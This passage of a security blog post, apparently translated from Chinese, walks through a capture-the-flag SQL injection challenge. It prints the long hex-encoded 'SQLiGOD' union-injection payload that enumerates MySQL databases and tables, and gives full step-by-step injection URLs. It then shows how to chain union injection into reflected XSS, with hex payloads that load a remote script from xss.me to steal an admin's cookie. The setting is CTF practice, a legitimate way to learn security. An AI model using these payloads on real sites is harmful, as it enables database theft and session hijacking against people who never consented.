65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c3078336337333633373236393730373433653731373536353732373933643232323233623636366637323238363933643331336236393363363336663663363336653734336236393262326232393762373137353635373237393364373137353635373237393262363336663663366536313664363535623639356432623232326333303738333233303333363133333631333233303263323233623764373537323663336437353732366332653732363537303663363136333635323832323237323232633232323533323337323232393362363436643730373137353635373237393364373537323663326537323635373036633631363336353238323236643631366236643631366532323263323232383733363536633635363337343238343032393230363637323666366432383733363536633635363337343238343033613364333037383330333032393230326332383733363536633635363337343230323834303239323036363732366636643238323232623634363232623232326532323262373436323663326232323239373736383635373236353238343032393230363936653230323834303361336436333666366536333631373435663737373332383330373833323330326334303263323232623731373536353732373932623232333037383333363333363332333733
32333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

I'll demonstrate how to use it on a website.

0x02 Demo
http://hackinglab.sinaapp.com/

We'll use one challenge on this site:
the second MySQL injection, a union injection with echo
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php

First let's look at the injection

<!-- tips: id=1

另外:通过前两个SQL注入题基本了解题目架构(SAE+RDS),有些注入在云环境下会有些不同之处-->

It hints at a parameter id=1; let's try submitting it via GET
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2

Wait, the echoed content is different
Let's try an injection test
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=2-1

It is injectable; now let's look at the columns
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 order by 3
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 order by 4

3 gave no error while 4 did, so the column count is 3

Use union select to see which columns are echoed
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and 1=2 union select 1,2,3
Columns 2 and 3 are echoed

At this stage of the injection we can try SQLiGOD to help us

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(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,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in 
(@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

Pass it into an echoed position, for example position 3 at this injection point
Build a URL
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and 1=2 union select 1,2,concat…….

Visit it
This can be anything; it is your name and will be shown as a marker on the page. After confirming,

follow the next prompt and build a URL to confirm
This must be makman, otherwise viewing the details of the database later is affected
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 and 1=2 union select 1,2,concat(0x6d616b,makman)
This is the URL entered earlier; it affects this spot

An odd id shows up: 12999
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=12999
which gives the flag
HKGGflagdfs56757fsdv

The principle is combining the information in information_schema with HTML to automate and speed up SQL enumeration.
Its drawbacks are obvious too: the scope is narrow, MySQL only, version 5 and above (for information_schema), and the injection must be the union echo type.
When some characters are filtered the script can be modified, for example replacing spaces with /**/ and so on, to get around the filter.

0x03 Thoughts prompted by SQLiGOD
After seeing this tool I kept turning it over in my head, even in the shower, and came up with a way to use it:
use the union echo to construct JS and achieve XSS, effectively a reflected XSS.
In some extreme situations it might be useful; for example, one scenario I thought of:
you have obtained the admin's account and password via union injection but cannot find the admin panel; if you can get an XSS to the admin, you may get the panel URL or similar.
Below are some experiments.
First, with Python:

>>> '<script>alert("appleu0")</script>'.encode('hex')
'3c7363726970743e616c65727428226170706c65753022293c2f7363726970743e'

Then build a URL
http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1%20and%201=2%20union%20select%201,2,0x3c7363726970743e616c65727428226170706c65753022293c2f7363726970743e
something like this
and it pops an alert box

>>> '<script src="http://xss.me/1.js"></script>'.encode('hex')
'3c736372697074207372633d22687474703a2f2f7873732e6d652f312e6a73223e3c2f7363726970743e'

http://hacklist.sinaapp.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1%20and%201=2%20union%20select%201,2,0x3c736372697074207372633d22687474703a2f2f7873732e6d652f312e6a73223e3c2f7363726970743e
Then use an XSS platform to grab the cookie and obtain the admin URL.

0x04 A step in SCTF
I used this trick in SCTF too, which is why this post was delayed (procrastination, really).
One step of pt400 in SCTF used this technique.
idc.sycsec.com had a simple injection with some light filtering: spaces were filtered, and %0a got around it, fairly simple.
The injection was easy; after getting the account and password I found there was also a bug-submission page.
This one needed some imagination; late in the competition a hint SQLi->XSS was given.
Then I built a URL that steals the cookie,
grabbed the admin URL and could log in.
The platform is shut down, so no screenshots.